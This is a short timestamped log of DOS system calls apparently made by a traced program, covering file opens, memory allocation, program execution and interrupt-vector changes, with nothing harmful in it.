2018-12-25T11:51:23.847365534Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.849121632Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T11:51:23.853501603Z 62 PC: 8f90e | Close file
2018-12-25T11:51:23.85517816Z 69 PC: 8f915 | Duplicate handle
2018-12-25T11:51:23.857182064Z 69 PC: 8f919 | Duplicate handle
2018-12-25T11:51:23.858619208Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T11:51:23.862579736Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T11:51:23.86399462Z 61 PC: 9387b | Open file (See above)
2018-12-25T11:51:23.86797121Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T11:51:23.869250627Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T11:51:23.870258941Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T11:51:23.87176259Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T11:51:23.873487121Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T11:51:23.876286515Z 72 PC: 8fa02 | Allocate memory
2018-12-25T11:51:23.878332663Z 72 PC: 8fa06 | Allocate memory
2018-12-25T11:51:23.879392307Z 73 PC: 8fa11 | Release memory
2018-12-25T11:51:23.880432743Z 73 PC: 8efea | Release memory
2018-12-25T11:51:23.882521427Z 74 PC: 8f003 | Reallocate memory
2018-12-25T11:51:23.884228213Z 72 PC: 8f054 | Allocate memory
2018-12-25T11:51:23.886016673Z 72 PC: 8f058 | Allocate memory
2018-12-25T11:51:23.888240324Z 73 PC: 8f060 | Release memory
2018-12-25T11:51:23.88961176Z 61 PC: 8f080 | Open file (Filename = 'r,S[
2018-12-25T11:51:23.89908535Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:51:23.905469952Z 66 PC: 8f0ad | Move file pointer
2018-12-25T11:51:23.906997641Z 62 PC: 8f0d1 | Close file
2018-12-25T11:51:23.909168361Z 75 PC: 8f0f2 | Execute program
2018-12-25T11:51:23.933037063Z 80 PC: 12be9 | Set current PSP
2018-12-25T11:51:23.934605118Z 48 PC: 12bee | Get DOS version
2018-12-25T11:51:23.936205195Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T11:51:23.939182174Z 101 PC: 12c74 | Get extended country info
2018-12-25T11:51:23.941224581Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T11:51:23.943067942Z 74 PC: 12cdc | Reallocate memory
2018-12-25T11:51:23.944760383Z 72 PC: 1355d | Allocate memory
2018-12-25T11:51:23.946894251Z 25 PC: 13596 | Get default drive
2018-12-25T11:51:23.948409194Z 71 PC: 135ad | Get current directory
2018-12-25T11:51:23.950210025Z 59 PC: 135ba | Change current directory
2018-12-25T11:51:23.954440996Z 59 PC: 135c8 | Change current directory
2018-12-25T11:51:23.958324822Z 59 PC: 135d3 | Change current directory
2018-12-25T11:51:23.960748261Z 25 PC: 12d13 | Get default drive
2018-12-25T11:51:23.962350033Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T11:51:23.963457167Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T11:51:23.964536147Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:51:23.966824642Z 80 PC: 1301d | Set current PSP
2018-12-25T11:51:23.967632227Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T11:51:23.968711504Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:51:23.970439872Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:51:23.97155867Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T11:51:23.973026733Z 72 PC: 130ec | Allocate memory
2018-12-25T11:51:23.975030297Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T11:51:23.990380475Z 62 PC: 131ba | Close file
2018-12-25T11:51:23.992395268Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T11:51:23.993601366Z 74 PC: 1197c | Reallocate memory
2018-12-25T11:51:23.995680976Z 72 PC: 11991 | Allocate memory
2018-12-25T11:51:23.997365194Z 73 PC: 119b2 | Release memory
2018-12-25T11:51:24.012568168Z 72 PC: 119bd | Allocate memory
2018-12-25T11:51:24.01479661Z 73 PC: 119df | Release memory
2018-12-25T11:51:24.015971104Z 72 PC: 119f5 | Allocate memory
2018-12-25T11:51:24.017906627Z 72 PC: 119fd | Allocate memory